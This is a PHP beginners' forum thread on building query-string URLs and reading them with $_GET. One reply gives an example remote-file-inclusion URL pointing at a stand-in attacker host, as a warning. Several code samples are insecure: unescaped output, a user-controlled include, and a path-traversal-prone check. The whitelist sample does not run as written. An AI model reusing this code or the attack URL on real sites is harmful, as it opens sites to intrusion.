http://www.url.domain/blah.php?id=3&blah.htm - HOW?

[Perry|]

Hello.

 

I am fairly new to PHP and I am currently starting to learn it. However, I was wondering how to create such a url as the title http://www.url.domain/blah.php?id=3&blah.htm as I am very interested in using it on my website as I am currently rebuilding it to make it more usable and dynamic and would like to implement this into my site.

 

Kind Regards,

 

Perry

[Psycho]

How do you create it? You just did, didn't you. I think your question needs to be more specific. But, I will provide some info that might be what you are looking for.

 

First off you must have a valid "base" path to a page such as

 

http://www.mydomain.com

 

Then you can add as many name/value pairs as you need. You start by adding a question mark after the base URL and then separate name value pairs with an ampersand. And, name/value pairs are indicated with an equal sign. Here is an example with spaces added for clarity

 

http://www.mydomain.com ? id=14 & page=display & method=list

 

You can then access those values in the php code using the $_GET array like so:

 

echo "The page value is " . $_GET['page']

[phpzone]

I am fairly new to PHP and I am currently starting to learn it. However, I was wondering how to create such a url as the title http://www.url.domain/blah.php?id=3&blah.htm as I am very interested in using it on my website as I am currently rebuilding it to make it more usable and dynamic and would like to implement this into my site.

 

A good resource when starting out is http://www.hudzilla.org/

 

That URL actually isn't the latest as its been moved to a Wiki, but I like the old site format best.

 

Do you understand what the parts in the URL are?

 

http://www.url.domain/ 

<- SITE URL

 

blah.php

<- THE PHP PAGE ON THE SITE

 

?

<- START OF QUERY STRING ( Variables passed in )

 

id=3

<- PASSING IN A '$_GET/$_REQUEST' variable with value of 3

 

&

<- QUERY STRING VARIABLE DELIMITER

 

blah.htm

<- NOT SURE WHERE YOU ARE GOING WITH THIS

 

The last item blah.htm could be a template maybe?  you would do ?id=3&template=blah

 

You can tack the .htm on in the PHP script, whilst also checking it exists and output a suitable message

if it doesn't.

 

A simple script to parse your URL would be:

 

<?php

     $id = $_GET['id'];
     $template = $_GET['template'];

     echo '<p>ID is ' . $id . '</p>';
     echo '<p>TEMPLATE is ' . $template . '</p>';

?>

 

Reading the Hudzilla manual will set you on your way

[Perry|]

Hello.

 

Sorry if I didn't explain it enough, What I need is to keep my page urls short as my site is full of guides so I need something like http://www.mydomain.com/guidetype.php?id=1 ( didn't mean to add that .htm thing on the end sorry )

 

Sorry, but I did not understand the replies that you have given me so could you explain it a bit more so I can fully understand it  Sorry if this sounds a bit rude!

 

Thanks,

 

Perry

 

PS. Where is the edit post button on this forum  I spent like 5 minutes trying to find it

 

 

[abigsmurf]

say if you had http://www.webpage.com/page.php?id=23

 

to read whatever 'id' is you use $_GET['id'] which in this case will output "23". To use this for navigation, you could include an include() on page.php. For example include("article".$_GET['id']."php") which in that case would display the contents of article23.php (it would be better to store articles in a database but that's much more complex) on page.php where the include is.

 

BIG WARNING: make sure if you're using php includes for navigation that it isn't possible to include offsite pages. All it would take to hack into your website would be for a script kiddy to type in "http://www.webpage.com/page.php?id=http://www.u-r-hacked.ru/lol.php" and they would have pretty much full access to your web server.

[Perry|]

BIG WARNING: make sure if you're using php includes for navigation that it isn't possible to include offsite pages. All it would take to hack into your website would be for a script kiddy to type in "http://www.webpage.com/page.php?id=http://www.u-r-hacked.ru/lol.php" and they would have pretty much full access to your web server.

How would I do that?

[wildteen88]

Always check to make sure the file you are including exists. I'd do:

if(isset($_GET['page']))
{
    $requested_page = $_SERVER['DOCUMENT_ROOT'] . '/' . $_GET['page'];

    if(file_exists($requested_page))
    {
          include $requested_page;
    }
}

 

To tighten security even more I'd setup an array of files which can be requested from the user. I'd then check to see if the requested file is in that array. If its in the array then include the requested file, otherwise display an error. Example

$safe_files = array( 'home.php', 'about.php', 'products.php', 'contact.php'):

if(isset($_GET['page']))
{
    $requested_page = $_SERVER['DOCUMENT_ROOT'] . '/' . $_GET['page'];

    if(in_array($_GET['page'], $safe_files)
    {
          include $requested_page;
    }
    else
    {
         die('Error: Requested file is invalid!');
     }
}